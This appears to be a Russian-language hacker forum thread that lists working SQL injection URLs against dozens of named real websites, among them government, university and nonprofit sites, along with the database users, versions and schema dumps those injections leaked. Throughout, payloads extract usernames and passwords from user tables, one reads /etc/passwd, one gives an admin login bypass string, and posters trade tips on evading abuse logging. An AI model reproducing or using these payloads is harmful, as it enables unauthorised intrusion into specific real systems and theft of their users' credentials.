http://www.datacenter-academy.com/site/index.php?id=2+union+select+1,2,3,4,5,6,version()
версия - 5.0.45

baltisk.ru - Официальный сайт Балтийского Муниципального Района

http://www.baltisk.ru/index2.php?option=com_joomradio&page=show_video&id=-1+union+all+select+1,concat_ws%280x3a,version%28%2 9,user%28%29,database%28%29%29,3,4,5,6,7+--+

5.0.67-log:u148676@10.10.153.172:u148676


ech-chaab.com PR-7

http://www.ech-chaab.com/ar/index2.php?option=com_joomradio&page=show_video&id=-1+union+all+select+1,concat_ws%280x3a,version%28%2 9,user%28%29,database%28%29%29,3,4,5,6,7+--+

log:journaledit0@imu116.infomaniak.ch:ech-chaabcom


tzaba.gr PR-4

http://www.tzaba.gr/index2.php?option=com_joomradio&page=show_video&id=-1+union+all+select+1,concat_ws%280x3a,version%28%2 9,user%28%29,database%28%29%29,3,4,5,6,7+from+jos_ users+--+

5.0.67.d7-ourdelta-log:tzaba@97.74.24.6:tzaba


laplata.abuelas.org.ar PR-4

http://www.laplata.abuelas.org.ar/index2.php?option=com_joomradio&page=show_video&id=-17+union+all+select+1,concat_ws%280x3a,version%28% 29,user%28%29,database%28%29%29,3,4,5,6,7+--+

5.0.24a-log:uv5642@localhost:uv5642_laplata


bces-india.com PR-4

http://www.bces-india.com/index2.php?option=com_joomradio&page=show_video&id=-1+union+all+select+1,concat_ws%280x3a,version%28%2 9,user%28%29,database%28%29%29,3,4,5,6,7+--+

5.1.45-log:bcesindi_bcesind@localhost:bcesindi_portal1

http://sovazs.com/showcontest.phtml?id=-15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ ws(0x3a%20,user(),database(),version()),14,15--

User: u_sovazs@localhost
Version: 5.0.51a-24+lenny3-log
Database: sovazs

http://www.solvex.ru/countries/israel/news/?id=48+and+1=2+union+select+version(),2,3--

Database Version: 5.1.39
Database name: solvexmdb
User name: root@localhost

http://www.gommed.ru/shop/items.php?id=590'+union+select+1,2,concat_ws(0x3a% 20,user(),database(),version()),4,5,6,7,8,9,10,11, 12/*

User: gommed_db@localhost
Version: 5.0.45
Database: gommed_db

Иньекция при авторизации ("Синхролайн")

http://sl.ru/admin/

Логин:admin' OR 'admin'='admin/*
Пароль: test

http://www.tptherapy.com/about.php?id=-19'+union+select+1,2,3,concat_ws(0x3a%20,user(),da tabase(),version()),5,6,7,8,9+from+admin/*

User: tpball_dbadmin@localhost
Version: 4.1.22-standard
Database: tpball_default

http://netrock101.com/web/modules/ecal/display.php
post
katid=-1 union select concat_ws(0x3a,uname,pass,level,user(),version()), 2 from runcms_users

netrock_netrock@localhost
5.0.90-community-log

------------------
PS get`ом не пробуйте, пишет абузу в лог

www.labtam.ru

http://www.labtam.ru/index.php?act=news&id=-9+union+select+1,2,version(),4,5,6,7,8,9,10--

www.linguaservice.ru

http://www.linguaservice.ru/?act=news&id=-27+union+select+1,version(),3,4,5--

www.formumandme.com

http://www.formumandme.com/article.php?a=-396+union+select+1,version(),3,4,5,6,7,8,9--

www.human-consult.net

http://www.human-consult.net/forum/error.php?errorid=-8+union+select+1,version()--

www.genderwork.ca

http://www.genderwork.ca/cms/displaysection.php?sid=-18+union+select+1,2,version()--

http://www.kitcom.ru/goods/index.php?gm=-5+union+select+1,2,aes_decrypt(aes_encrypt(concat_ ws(0x3a,@@version,user(),database(),@@version_comp ile_os),0x71),0x71)+--

version : 4.1.21
user : kitcom@localhost
database : fpublisher
os : alt-linux-gnu

http://www.kitcom.ru/goods/index.php?gm=-5+union+select+1,2,aes_decrypt(aes_encrypt(group_c oncat(login,0x3a,pwd,0x3a,email+SEPARATOR+0x0b),0x 71),0x71)+from+users+limit+0,1+--

/admin/
/sqladmin/
/tmp/

может у кого и получится....

http://www.artlies.org/article.php?id=-1869+union+select+1,2,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os),4,5,6,7,8,9,1 0--+&issue=65&s=0
version:4.1.25-Debian_mt1
user:artlies@64.13.232.11
pr:5

http://www.joinava.org/APS4P20081101A/ava.php?id=-34+union+select+concat_ws(0x3a%20,user(),database( ),version())+from+cms_users


User: joinava2_joinava@localhost
Version: 5.0.90-community
Database: joinava2_APS3Production

ecadigitallibrary.com

http://ecadigitallibrary.com/conference.php?cid=-8+union+select+1,2,version(),4,5,6,7,8,9,10--

http://www.concertonet.com/scripts/cd.php?ID_cd=-1892+union+select+1,2,3,4,5,6,7,8,9,10,11

user(): sc_concertonet@localhost
version(): 5.0.45
database(): sc_concertonet
OS: шапка

http://www.landroverspb.ru/see.php?view=4&id=-731+union+select+1,2,3,4,5,6,concat_ws(0x3a%20,use r(),database(),version()),8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23--

User: landrospru@localhost
Version: 4.1.22-lk-log
Database: landrospru

http://fabrica-ptic.ru/rss.php?id=-1+union+all+select+1,2,3,aes_decrypt(aes_encrypt(c oncat_ws(0x3a,@@version,user(),database(),@@versio n_compile_os),0x71),0x71),5,6,7,8,9,10+--

version : 5.1.39
user : prodorog_ptich@localhost
database : prodorog_ptichiidvor
os : unknown-linux-gnu

http://fabrica-ptic.ru/rss.php?id=-1+union+all+select+1,2,3,concat_ws(0x3a,login,pwd, email),5,6,7,8,9,10+from+mysite_authsiteusers--

http://www.megapolis.kz/show_article.php?art_id=14550+and+1=0+union+select +user(),version(),3,4,5,6,7,8,9,10,11,12,database( )--

user(): megapoli_user@localhost
version(): 5.0.90-community-log
database(): megapoli_db

http://www.cemsys.com/pressreleases.php?id=78+union+select+1,2,3,4,5,6,7

Version: 5.0.68-percona-3-log
Database: cemsyscom_95063_db1
User: ucemsysc_95063_1@linweb7.atlas.pipex.net

http://www.idn.cz/portfolio_genre.php?lang=en&id=-78+union+select+1,2,concat(version(),0x3a,user(),0 x3a,database())

Version: 4.0.27
Database: LH257300@LOCALHOST
User: LH257300DB

http://www.ih-ra.com/newsroom/full_articles.php?article_ID=-49+union+select+1,concat(userID,char(58),pass,char (32,58,32),email),3,4,5,6,7,8,9,10+from+members+li mit+0,1--

http://lifexchange.ru/articles/view/id/116+and+1=2+union+select+1,2,3,4,5,6,concat_ws(0x3 a,user(),version(),database()),8,9,10,11,12,13,14--.html

user(): u200939@10.10.153.211
version(): 5.0.67-log
database(): u200939

http://www.pap.org.sg/articleview.php?id=1514&mode=&cid=-23+union+select+1,2,concat_ws(0x3a%20,user(),datab ase(),version()),4,5,6,7,8,9/*

User: pap_db@localhost
Version: 5.0.22
Database: pap

Google PR: 6

http://www.ritex-t.ru/index.php?id=2&row=-13+union+all+select+1,2,3,4,5,aes_decrypt(aes_encr ypt(concat_ws(0x3a,@@version,user(),database(),@@v ersion_compile_os),0x71),0x71),7,8+--

version : 5.0.67-log
user : u57230@10.10.10.208
database : u57230
os : unknown-freebsd6.3

http://www.gimn4.com/user.php?id=-3+union+select+1,concat(LOGIN,0x3a,PASSWORD,0x3a,R EG_MAIL),3,4,5,6,7,8,9,10,11,12,13,14,15+from+syst em_users
g4_user004@localhost:g4_new:5.0.51a-24+lenny2+spu1

http://www.crossmaster.ru/free-crossword-puzzles-stats-user.php?id=-3+union+select+1,2,3,concat_ws(0x3a,user(%20),data base(),version()),5%20--

http://www.krasrepetitor.ru/card-user.php?id=-13+union+select+1,2,concat(user_name,0x3a,user_pas sword),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+kr _user+limit+1,1
krtmps@localhost:krtmps:5.0.67-percona-b5-log
http://www.cutezone.ru/pages/user.php?id=-50+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,concat(Lo gin,0x3a,Password,0x3a,Email),30,31,32+from+std_us ers
cutezone1@localhost:db_cutezone1:5.0.67-community

http://www.home-sweethome.nl/en/index.php?pid=-3+union+select+1,2,3,4,concat(user(),version(),dat abase(),@@version_compile_os)--

ПРОКУРАТУРА КОСТРОМСКОЙ ОБЛАСТИ

http://www.kosoblproc.ru/default.php?page=news&id=-3044+union+select+1,2,3,aes_decrypt(aes_encrypt(co ncat_ws(0x3a,version(),user(),database(),@@version _compile_os),0x71),0x71),5+--

version : 4.1.9-standard-log
user : kosoblprocru@localhost
database : kosoblprocru
os : unknown-freebsd4.7

http://animeradio.ru/ownblog.php?uid=1'
Не получается найти таблицы, кто нибудь может помочь?
http://animeradio.ru/ownblog.php?uid=-1+union+all+select+1,2,3,concat_ws%280x3a,login,pw d,%20email%29,5,6,7,8,9,10+from+anime--

http://www.volgotrans.mv.ru/front/profile.php?id=-573+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35%20--
kater@localhost:volgotrans:5.0.51a-24+lenny2+spu1-log

http://www.ccs-tlt.ru/price/firm_profile.php?id=-6+union+select+1,2,3,4,5,6,7,8,9,10%20--
ccstlt@localhost:ccstlt:4.0.24mysql Ver 34.52 Distrib 4.01.44, f-log


http://www.kfmesi.ru/profile.php?id=-16+union+select+1,2,3,concat(username,0x3a,user_pa ssword),5,6,7,8,9,10,11,12,13,14,15,16+from+phpbb_ users
naher@localhost:poher:5.0.51a

http://allaudi.ru/profile.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27%20--
allaudi_user001@localhost:allaudi_mainbase:5.0.51a-24+lenny2+spu1


http://map.barierovnet.org/profile.php?id=-7+union+select+1,2,3%20--
u175600@10.8.0.71:u175600_2:5.0.90-log

http://www.psbspeakers.ru/ru/news/index.php?id63=48+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15%20--




root@:bonanza:5.0.45

http://www.emiclassics.com/artistbiography.php?aid=-21+union+select+1,2,3,concat(username,char(58),pas sword),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26+from+users+limit+0,1

PR-7

http://runaki.net/print.php?section=wtar&id=-1/**/union/**/all/**/select/**/1,load_file('/etc/passwd'),3,4,5,6,7--


http://runaki.net/details.php?section=wtar&id=-1/**/union/**/all/**/select/**/1,user,3,pass,5,6,7+from+user--

http://coh.redtomax.com/contacts/contact.php?id=99999999+union+select+1,concat_ws(0 x3a%20,user(),database(),version()),3,4,5,6,7,8,9, 10,11,12/*

User: nofuture@localhost
Version: 5.0.32-Debian_7etch11-log
Database: nofuture

орги


http://www.hmsu.org/showgig.php?gigid=-178+union+select+1,2,3,4,concat(username,char(58), password),6,7,8,9+from+HMSUAuth--

user(): root@localhost
version(): 5.1.22-rc-log
database(): hmsu
OS: portbld-freebsd7.0
--------------------------------------------------------------------
http://www.globalcanopy.org/main.php?m=117&sm=-176+union+select+1,2,3,4,5,6

user(): globalcanopy@localhost
version(): 5.0.27
database(): globalcanopy
OS: шапочка
--------------------------------------------------------------------
http://www.mielomabrasil.org/news2.php?id_not=-42+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16--

user(): myeloma@187.45.193.218
version(): 4.1.22-locaweb-log
database(): myeloma
OS: pc-linux-gnu
--------------------------------------------------------------------
http://www.archivalencia.org/contenido.php?a=5&modulo=71&pad=5&cat=-14+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

user(): usrarchi3871@localhost
version(): 5.0.45-community-nt
database(): db_archidiocesis
OS: Windows
--------------------------------------------------------------------
http://www.cartadelapaz.org/portal_cp/ahumor_detall.php?id=-294+union+select+1,2,(user_name,char(58),user_pass word),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+ agora.phpbb_users--

user(): cartapaz@web.pangea.lan
version(): 5.0.51a-24+lenny
database(): cartapaz
OS: Debian
--------------------------------------------------------------------
http://www.chantez-online.org/chant.php?ID=-833+union+select+1,2--

user(): chantezonline@10.0.45.57
version(): 5.0.90-log
database(): chantezonline
OS: pc-linux-gnu

http://www.wanlebanon2010.com - PR 6

http://www.wanlebanon2010.com/articles.php?id=-2+union+select+1,version(),3,4,5,6,7--

Database Version: 5.0.51a-24+lenny3-log
Database name: lebanon2010
User name: lebanon@localhost

-----------------------------------------------------------------------------------------------------------

http://www.psy.ohio-state.edu - PR 6

http://www.psy.ohio-state.edu/php/FullEvent.php?id=63+union+select+1,2,3,4,5,6,versi on(),8,9--

Database Version: 5.0.77
Database name: department
User name: soyung@localhost

-----------------------------------------------------------------------------------------------------------

http://www.genomics.cn - PR 6

http://www.genomics.cn/en/edu.php?id=-201+union+select+version(),2,3,4,5--

Database Version: 5.0.77-log
Database name: newbgi
User name: www@192.168.8.5

http://202.120.108.10/depart/index.php?mod=Default&act=Xy&id=-7+union+select+1,2,concat(user(),version,database( ),@@version_compile_os),4,5,6

http://tatural.ru/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,password),3,4,5,6 ,7+from+jos_users+--+

http://kookdookoo.com/punjabi/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,password),3,4,5,6 ,7+from+jos_users+--+

http://poltavo.com/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,password),3,4,5,6 ,7+from+jos_users+--+

http://www.baltisk.ru/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,password),3,4,5,6 ,7+from+jos_users+--+

http://www.home.zemliaky.org/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,password),3,4,5,6 ,7+from+jos_users+--+

http://ofaqim.info/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,id,user name,password))),3,4,5,6,7+from+jos_users+--+

http://i-de.org.ru/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,passwor d))),3,4,5,6,7+from+jos_users+--+

http://snt-tvoydom.ru/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,passwor d))),3,4,5,6,7+from+jos_users+--+

http://www.ruworld.org/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,passwor d))),3,4,5,6,7+from+jos_users+--+

http://www.newradio.ru/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,passwor d))),3,4,5,6,7+from+jos_users+--+

http://mozhga18.ru/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,passwor d))),3,4,5,6,7+from+jos_users+--+

http://www.g-news.com.ua/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,passwor d))),3,4,5,6,7+from+jos_users+--+

http://www.iaaf12.com/wap/wapmain.php?option=onews&action=link&id=-1+union+select+1,username,3,password,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28+from+cms_users

http://vig.bstu.by/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat_ws(0x3a,username,password),4,5,6,7,8+fr om+jos_users+-0-+

http://www.dpack.ru/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat_ws(0x3a,username,password),4,5,6,7,8+fr om+jos_users+--+

http://crd-institute.com/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,password,username,5,6,7,8+from+crd_users+--+

http://sams.perm.ru/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8+from+ jos_users+--+&Itemid=92

http://www.foxcom.ru/jml/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password),5,6,7+from+jo s_users--

http://miacom.kz/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password),5,6,7+from+jo s_users--

http://www.misiabela.pl/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,username,password ),3,4,5,6,7+from+jos_users+--+&Itemid=92

http://www.wegp.net/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,username,password ),3,4,5,6,7+from+jos_users+--+&Itemid=92

http://www.mentalwear.fi/web/index.php?id=41&shop_show_product=1&tuote_id=-73+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17--

user(): mentalwearfi@10.1.0.15
version(): 5.0.45-log
database(): mentalwearfired
os: шапочка

Pr 4

http://www.plusbellelavie.org/news2.php?id=-1/**/union/**/all/**/select/**/1,user(),3,database(),5,6,7,8,9,10,11


http://www2.candw.lc/Media/news2.php?ID=-1/**/union/**/all/**/select/**/1,user(),version(),4,5,6,7,8--


user(): cwslu@localhost
version(): 4.0.18-nt



http://62.149.36.239/~pamco/news2.php?id=-1/**/union/**/all/**/select/**/1,2,user(),4,version(),6,7--


user(): pamco_pamco2@localhos
version(): 4.1.22-standard

Сайт: http://www.sasymphony.org
ТИЦ: 10
PR: 5
Пример запроса: http://www.sasymphony.org/index3.php?eventIdD=-25+union+select+1,now(),3,4,5,concat_ws(0x0b,datab ase(),user(),version(),@@version_compile_os),7,8,9 ,group_concat(0x0b,table_name),11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37+from+information_schema.tables--+

version - 5.0.90-community
user - sasympho@localhost
database - sasympho_symphonysite
os - pc-linux-gnu
tables:

CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
KEY_COLUMN_USAGE,
PROFILING,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
categories,
domains,
keywords,
link_keyword0,
link_keyword1,
link_keyword2,
link_keyword3,
link_keyword4,
link_keyword5,
link_keyword6,
link_keyword7,
link_keyword8,
link_keyword9,
link_keyworda,
link_keywordb,
link_keywordc,
link_keywordd,
link_keyworde,
link_keywordf,
links, pending,
query_log,
site_category,
sites,
temp,
0506season,
0607season,
0708season,
0708ypc_scholar,
0708ypc_tix,
0809season,
0809ypc_scholar,
0809ypc_tix,
0910season,
0910ypc_scholar,
0910ypc_tix,
1011season,
Classical_seatingPrice,
PopsSpec_seatingPrice,
Pops_seatingPrice,
PressRelease,
Renewals,
band_email,
brd_directors,
cd_order_07,
cd_order_08,
cd_order_09,
cd_orders,
concert_series,
concert_series_detail,
concert_series_price_c,
concert_series_price_p,
donation_proc,
email_blast,

columns:

CHARACTER_SET_NAME,
DEFAULT_COLLATE_NAME,
DESCRIPTION,
MAXLEN,
COLLATION_NAME,
CHARACTER_SET_NAME,
ID,
IS_DEFAULT,
IS_COMPILED,
SORTLEN,
COLLATION_NAME,
CHARACTER_SET_NAME,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
ORDINAL_POSITION,
COLUMN_DEFAULT,
IS_NULLABLE,
DATA_TYPE,
CHARACTER_MAXIMUM_LENGTH,
CHARACTER_OCTET_LENGTH,
NUMERIC_PRECISION,
NUMERIC_SCALE,
CHARACTER_SET_NAME,
COLLATION_NAME,
COLUMN_TYPE,
COLUMN_KEY,
EXTRA,
PRIVILEGES,
COLUMN_COMMENT,
GRANTEE,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
PRIVILEGE_TYPE,
IS_GRANTABLE,
CONSTRAINT_CATALOG,
CONSTRAINT_SCHEMA,
CONSTRAINT_NAME,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
ORDINAL_POSITION,
POSITION_IN_UNIQUE_CONSTRAINT,
REFERENCED_TABLE_SCHEMA,
REFERENCED_TABLE_NAME,
REFERENCED_COLUMN_NAME,
QUERY_ID,
SEQ,
STATE,
DURATION,
CPU_USER,
CPU_SYSTEM,
CONTEXT_VOLUNTARY,
CONTEXT_INVOLUNTARY,
BLOCK_OPS_IN,
BLOCK_OPS_OUT,
MESSAGES_SENT,
MESSAGES_RECEIVED,
PAGE_FAULTS_MAJOR,
PAGE_FAULTS_MINOR,
SWAPS,
SOURCE_FUNCTION,
SOURCE_FILE,
SO

===================================

Сайт: http://www.franziskaner-minoriten.de
ТИЦ: 0
PR: 4
Пример запроса: http://www.franziskaner-minoriten.de/index3.php?id=130+or+(select+count(*)+from+(select +1+union+select+2+union+select+3)x+group+by+concat (mid(version(),+1,+63),+floor(rand(0)*2)))--+
user - db_minoriten@localhost
version - 5.0.45
database - db_minoriten
os - redhat-linux-gnu

===================================

Сайт: http://www.enpi-info.eu
ТИЦ: 20
PR: 7
Пример запроса: http://www.enpi-info.eu/main.php?id=344&id_type=2+or+(select+count(*)+from+(select+1+union +select+2+union+select+3)x+group+by+concat(mid(use r(),+1,+63),+floor(rand(0)*2)))--+
user - enpid@localhost
version - 5.0.45
database - enpidef
os - redhat-linux-gnu

http://www.bosnia.ba/razglednice/index.php?dk=-13+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,use r(),version(),database(),@@version_compile_os),10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39+--

http://www.music-key.ru/shop.php?uid=-3071+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,0--

http://www.persons-journal.com/index.php?context=submenu2&id=271%20union%20select %20group_concat%28table_name%29%20from%20informati on_schema.tables%20limit%201,1/*&pid=265&s=188

casgroup.fiu.edu/lacc/pages.php?id=719UNION ALL SELECT 1,%String_Col%,3,4,5,6,7--
Host IP: 131.94.74.225
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.1.6
DB Server: MySQL >=4.1
Current DB: cas

www.rhinossoccer.com/pages.php?id=23UNION ALL SELECT 1,2,3,%String_Col%,5,6,7,8,9,10,11--
Host IP: 69.163.245.54
Web Server: Apache
Powered-by: PHP/5.2.12
DB Server: MySQL unknown ver
Current DB: rhinossoccer

Yandex ТИЦ 10
Google PageRank 5

Своеобразный вывод..
http://www.globalresearch.ca/index.p...t=va&aid=18768+union+select+1,2,3,version(),5,6,7,8,9,0 ,1,2,3,ve rsion(),5,6,7,8,9,0,1,2,3,version(),5,6,7,8,9,0,1, 2,3,version(),5,6,7,8,9,0,1,2,3,version(),5,6,7,8, 9,0,1,2+limit+1,1--

http://artmaterial.ru/about.php?content=dealer&id=-1%20union%20select%201,2,3,user_login,user_passwor d,6,7,8,9,0,1,2%20from%20users+limit+1,1

http://www.spinter.net/page.php?id=-2+union+select+1,concat(user(),char(58),version(), char(58),database())

www.williambloom.com/pages.php?id=44UNION ALL SELECT 1,2,%String_Col%,4,5 and 'x'='x
Host IP: 83.223.101.10
Web Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8b mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8
Powered-by: PHP/5.2.8
DB Server: MySQL >=5
Current DB: williamb_db



www.costasales.com/pages.php?id=168UNION ALL SELECT %String_Col%,2 and 'x'='x
Host IP: 87.106.251.143
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Current DB: costasales_csales


www.snakedancecondos.com/pages.php?id=18 18' AND %True_Expression% AND 'x'='x
Host IP: 209.188.112.4
Web Server: Apache/2.2.3 (Red Hat)
Powered-by: PHP/5.2.11
DB Server: MySQL >=5
Current DB: snakedancecondos

www.thereddstone.com/pages.php?id=3UNION ALL SELECT 1,%String_Col%,3,4--
Host IP: 64.150.165.92
Web Server: Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
Powered-by: PHP/5.2.0-8+etch15
DB Server: MySQL >=5
Current DB: phpmy1_thereddstone_com

www.connexions-berkshire.org.uk/pages.php?id=230 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,%String_Col%,12,13,14--
Host IP: 217.77.176.23
Web Server: Zeus/4.2
Powered-by: PHP/4.4.2
DB Server: MySQL
Current DB: connexions-berkshire

www.brightworks.net/pages.php?id=leed AND %True_Expression% AND 'x'='x
Host IP: 98.129.111.2
Web Server: Apache/2.2.3 (Red Hat)
Powered-by: PHP/5.2.13
DB Server: MySQL >=5
Current DB: brightworks_site


хакИр :) :rolleyes: :cool:

+++

http://www.novosarajevo.ba/stream/article.php?pid=-301+union+select+1,2,3,aes_decrypt(aes_encrypt(con cat(user(),char(32,58,32),version(),char(32,58,32) ,database()),1),1),5,6,7,8,9,10,11,12,13,14,15,16, 17,18--

www.col3negoriginal.com/pages.php?id=14 UNION ALL SELECT 1,%String_Col%,3 and 'x'='x
Host IP: 85.25.124.18
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6

DB Server: MySQL unknown ver
Current DB: lasantha_col3neg

www.huronperthrentals.ca/pages.php?id=2 UNION ALL SELECT 1,%String_Col%,3--
Host IP: 69.41.197.19
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Current DB: rentals

www.ccop.org/pages.php?id=38 AND %True_Expression% AND 'x'='x
Host IP: 216.92.217.5
Web Server: Apache/2.2.14
Powered-by: PHP/5.2.11
DB Server: MySQL >=5
Current DB: kinnon_ccop

www.fetalmonitors.biz/pages.php?ID=13 AND %True_Expression%
Host IP: 74.55.84.245
Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.2
Powered-by: PHP/4.4.8
DB Server: MySQL >=5
Current DB: tiyanak_cmsorig

www.turkishculture.org/pages.php?ParentID=14&ID=70 AND %True_Expression% AND 'x'='x
Host IP: 209.197.125.227
Web Server: Apache/2.2.15
Powered-by: PHP/5.2.13
DB Server: MySQL >=5
Current DB: turkish2_tcp

cmrc.ucc.ie/pages/K_staff_page.php?id=27 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12 and 'x'='x
Host IP: 143.239.1.112
Web Server: Apache/2.0.52 (Red Hat)
Powered-by: PHP/4.3.9
DB Server: MySQL >=4.1
Current DB: cmrc

www.sochi-international.ru/pages.php?id=2 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9,10,11 and 'x'='x
Host IP: 77.222.40.36
Web Server: Apache/1.3.37-lk.a (Unix) mod_defer/0.1.lk mod_python/2.7.11 Python/2.4.3 PHP/4.4.4 mod_dp/lk.0.4.4
Powered-by: PHP/4.4.4
DB Server: MySQL >=5
Current DB: sochiinr

http://www.starfiredirect.com/pages.php?id=5 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8--
Host IP: 66.147.249.135
Web Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2 mod_auth_passthrough/2.1 FrontPage/5.0.2.2635
Powered-by: PHP/5.2.11
DB Server: MySQL unknown ver
Current DB: starfir3_starfiredb

cmrc.ucc.ie/pages/K_staff_page.php?id=27 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12 and 'x'='x
Host IP: 143.239.1.112
Web Server: Apache/2.0.52 (Red Hat)
Powered-by: PHP/4.3.9
DB Server: MySQL >=4.1
Current DB: cmrc

www.starting-gate.com/pages.php?id=26 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8 and 'x'='x
Host IP: 69.163.243.21
Web Server: Apache
Powered-by: PHP/5.2.13
DB Server: MySQL >=5
Current DB: 361641_startinggate

Сайт: http://www.portalcoquimbo.cl
ТИЦ: 10
PR: 4
Пример запроса: http://www.portalcoquimbo.cl/index3.php?id=-826+union+select+1,concat_ws(0x0b,version(),databa se(),user(),@@version_compile_os),now(),group_conc at(0x0b,table_name),5,6+from+information_schema.ta bles--+
version - 5.0.90-community-log
database - portalco_portal
user - portalco_portal@localhost
os - unknown-linux-gnu
tables:

CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
KEY_COLUMN_USAGE,
PROFILING,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
bandeja,
boletinu,
categories,
categories_description,
cities,
clasificados,
comentarios,
comentarios_corr,
configuration,
configuration_group,
contenido_pg_en,
contenido_pg_es,
corresponsal_web,
encuestas_campos,
encuestas_encuestas,
encuestas_respuestas,
foro_categorias,
foro_foros,
foro_respuestas,
foro_temas,
galeria,
galerias,
gente_online,
ibf_admin_logs,
ibf_admin_permission_keys,
ibf_admin_permission_rows,
ibf_admin_sessions,
ibf_announcements,
ibf_attachments,
ibf_attachments_type,
ibf_badwords,
ibf_banfilters,
ibf_bulk_mail,
ibf_cache_store,
ibf_cal_calendars,
ibf_cal_events,
ibf_calendar_events,
ibf_components,
ibf_conf_settings,
ibf_conf_settings_titles,
ibf_contacts,
ibf_custom_bbcode,
ibf_dnames_change,
ibf_email_logs,
ibf_emoticons,
ibf_faq,
ib

columns:

CHARACTER_SET_NAME,
DEFAULT_COLLATE_NAME,
DESCRIPTION,
MAXLEN,
COLLATION_NAME,
CHARACTER_SET_NAME,
ID,
